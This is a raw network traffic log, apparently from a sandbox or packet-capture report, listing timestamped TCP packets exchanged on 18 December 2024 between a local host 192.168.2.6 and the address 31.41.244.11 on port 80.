                                                                                                                                                              Dec 18, 2024 11:47:28.673618078 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.673629045 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.673660994 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.673733950 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.674299955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.674312115 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.674325943 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.674343109 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.674441099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.675077915 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.675137997 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.675149918 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.675173044 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.675173044 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.675204039 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.675918102 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.675930023 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.675945997 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.675978899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.675978899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.675991058 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.676711082 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.676733971 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.676752090 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.676772118 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.676822901 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.677031040 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.677479982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.677521944 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.677536011 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.677567959 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.677597046 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.678299904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.678350925 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.678363085 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.678416014 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.678416014 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.679066896 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.679079056 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.679094076 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.679126978 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.679174900 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.679887056 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.679899931 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.679913998 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.679935932 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.679963112 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.680674076 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.680715084 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.680727959 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.680748940 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.680748940 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.680778980 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.681540966 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.681555033 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.681561947 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.681629896 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.682291985 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.682317019 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.682331085 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.682349920 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.682391882 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.683082104 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.683140039 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.683152914 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.683186054 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.683897972 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.683911085 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.683923960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.683962107 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.683984995 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.684741974 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.684753895 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.684767008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.684799910 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.684799910 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.685574055 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.685585976 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.685599089 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.685650110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.685650110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.686348915 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.686362982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.686378002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.686417103 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.686461926 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.687122107 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.687134981 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.687150002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.687182903 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.687277079 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.687963963 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.688174963 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.688184023 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.688196898 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.688210011 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.688229084 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.688246965 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.688280106 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.688983917 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.688997030 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.689009905 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.689028978 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.689050913 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.689776897 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.689789057 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.689802885 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.689830065 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.689878941 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.690594912 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.690607071 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.690619946 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.690695047 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.690695047 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.691386938 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.691410065 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.691421986 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.691467047 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.691467047 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.692235947 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.692249060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.692255974 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.692387104 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.692939043 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.692982912 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.692996979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.693061113 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.693061113 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.693834066 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.693857908 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.693871021 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.693902016 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.694111109 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.694770098 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.694782972 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.694797993 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.694842100 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.694842100 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.695364952 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.695409060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.695420980 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.695444107 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.695444107 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.695506096 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.696245909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.696259022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.696274996 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.696306944 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.696307898 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.697000980 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.697015047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.697027922 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.697050095 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.697793961 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.697807074 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.697849035 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.697849035 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.861519098 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.861538887 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.861553907 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.861613035 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.861668110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.861866951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.861880064 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.861922979 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.861926079 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.862474918 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.862550020 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.862602949 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.862611055 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.862628937 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.862701893 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.863321066 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.863373041 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.863385916 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.863442898 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.863442898 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.864175081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.864187002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.864202023 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.864226103 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.864286900 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.865026951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.865040064 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.865051985 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.865072012 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.865091085 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.865732908 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.865768909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.865782976 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.865793943 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.865811110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.865942955 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.866544008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.866589069 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.866602898 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.866630077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.866677046 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.867363930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.867397070 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.867412090 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.867432117 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.867432117 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.867480993 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.868237019 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.868249893 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.868262053 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.868335962 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.868335962 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.869013071 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.869025946 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.869036913 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.869102955 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.869143009 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.869859934 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.869874001 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.869939089 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.869961023 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.870049953 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.870520115 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.870567083 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.870570898 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.870584011 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.870631933 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.871371984 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.871458054 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.871486902 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.871598005 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.871629953 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.871630907 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.872133017 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.872191906 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.872205019 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.872232914 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.872268915 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.873012066 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.873024940 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.873037100 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.873085022 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.873085022 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.873754978 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.873768091 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.873780966 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.873816967 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.873840094 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.874576092 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.874650002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.874718904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.874763966 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.874763966 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.875374079 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.875386000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.875399113 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.875446081 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.875446081 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.876183033 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.876197100 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.876209021 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.876247883 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.876247883 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.876962900 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.877007961 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.877019882 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.877037048 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.877048969 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.877082109 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.877749920 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.877783060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.877794981 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.877821922 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.877821922 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.877867937 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.878642082 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.878698111 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.878864050 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.878895998 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.878909111 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.878920078 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.878948927 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.878972054 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.879637957 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.879652023 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.879666090 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.879692078 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.879738092 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.880441904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.880455971 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.880532026 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.880562067 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.880646944 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.881208897 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.881223917 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.881285906 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.881287098 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.881311893 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.881424904 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.882061958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.882085085 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.882097960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.882121086 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.882121086 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.882145882 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.882926941 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.882940054 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.882957935 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.883099079 CET4983780192.168.2.631.41.244.11
